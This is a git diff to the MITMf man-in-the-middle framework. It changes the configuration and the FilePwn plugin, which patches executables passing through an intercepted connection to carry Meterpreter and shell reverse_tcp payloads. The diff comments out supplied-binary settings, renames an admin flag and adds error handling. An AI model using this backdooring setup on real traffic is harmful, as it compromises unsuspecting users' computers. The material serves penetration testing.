diff --git a/config/mitmf.conf b/config/mitmf.conf index 77af21c..1b946cd 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -457,10 +457,10 @@ # RUNAS_ADMIN will attempt to patch requestedExecutionLevel as highestAvailable RUNAS_ADMIN = False # XP_MODE - to support XP targets - XP_MODE = True + #XP_MODE = True # SUPPLIED_BINARY is for use with PATCH_METHOD 'onionduke' DLL/EXE can be x64 and # with PATCH_METHOD 'replace' use an EXE not DLL - SUPPLIED_BINARY = veil_go_payload.exe + #SUPPLIED_BINARY = veil_go_payload.exe MSFPAYLOAD = windows/meterpreter/reverse_tcp [[[[WindowsIntelx64]]]] @@ -479,7 +479,7 @@ RUNAS_ADMIN = False # SUPPLIED_BINARY is for use with PATCH_METHOD onionduke DLL/EXE can x86 32bit and # with PATCH_METHOD 'replace' use an EXE not DLL - SUPPLIED_BINARY = pentest_x64_payload.exe + #SUPPLIED_BINARY = pentest_x64_payload.exe MSFPAYLOAD = windows/x64/shell/reverse_tcp [[[[MachoIntelx86]]]] diff --git a/plugins/filepwn.py b/plugins/filepwn.py index 83d947c..2c7ebec 100644 --- a/plugins/filepwn.py +++ b/plugins/filepwn.py @@ -374,12 +374,11 @@ class FilePwn(Plugin): ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, - RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']), + CHECK_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']), PATCH_DLL=self.str2bool(self.WindowsIntelx64['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], ZERO_CERT=self.str2bool(self.WindowsIntelx64['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower(), - SUPPLIED_BINARY=self.WindowsIntelx64['SUPPLIED_BINARY'], + PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() ) result = targetFile.run_this() @@ -408,13 +407,11 @@ class FilePwn(Plugin): ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, - RUNAS_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']), + CHECK_ADMIN=self.str2bool(self.WindowsIntelx86['RUNAS_ADMIN']), PATCH_DLL=self.str2bool(self.WindowsIntelx86['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], ZERO_CERT=self.str2bool(self.WindowsIntelx86['ZERO_CERT']), - PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower(), - SUPPLIED_BINARY=self.WindowsIntelx86['SUPPLIED_BINARY'], - XP_MODE=self.str2bool(self.WindowsIntelx86['XP_MODE']) + PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() ) result = targetFile.run_this() @@ -610,7 +607,7 @@ class FilePwn(Plugin): self.log.debug("Updating Config {0}: {1}".format(key, value)) def response(self, response, request, data): - + try: content_header = response.headers['content-type'] client_ip = request.client.getClientIP() host = request.headers['host'] @@ -674,4 +671,6 @@ class FilePwn(Plugin): self.clientlog.error(exc, extra=request.clientInfo) self.clientlog.warning("Returning original file", extra=request.clientInfo) - return {'response': response, 'request': request, 'data': data} \ No newline at end of file + return {'response': response, 'request': request, 'data': data} + except: + self.clientlog.error('Filepwn failed to response this request', extra=request.clientInfo)